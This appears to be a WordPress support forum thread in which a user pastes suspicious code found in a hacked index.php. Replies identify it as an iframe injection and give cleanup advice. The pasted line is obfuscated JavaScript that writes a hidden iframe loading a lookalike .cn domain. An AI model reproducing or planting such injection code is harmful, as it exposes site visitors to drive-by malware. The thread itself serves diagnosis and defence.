You can get this sort of thing if your site has been hacked. Check this index.php for suspicious code.
iridiax is right, you can get this if you’ve been hacked. Doesn’t mean that you have, though.
If you see some weird code in your index.php file, like an iframe or some other code which doesn’t belong, realize that might not be the only file infected. Make sure to change all usernames and more importantly, passwords – that includes your database password and FTP password.
Then install the Blue Trait Event Viewer plugin so you can keep an eye out for unwanted logins or changes.
On further inspection, my wp-admin page is giving me a similar error.
Here’s the code in question, but it really doesn’t make any sense to me:
/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?><?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>'; ?>
It’s an iframe insertion, your site has been hacked. For more info, see:
http://wordpress.org/support/topic/281767
Thanks. I’ve gotten it under control now.
ronalddaniels – I’ll be doing a guest post on another blogger’s blog on Friday about securing WordPress. You might want to stop by.
Her site is http://bloggingwithoutablog.com. If I remember, I’ll head back over here after the article is published and link to it (as long as the forum moderators don’t mind the link).
Anyone else with security tips are welcomed to join in as well.
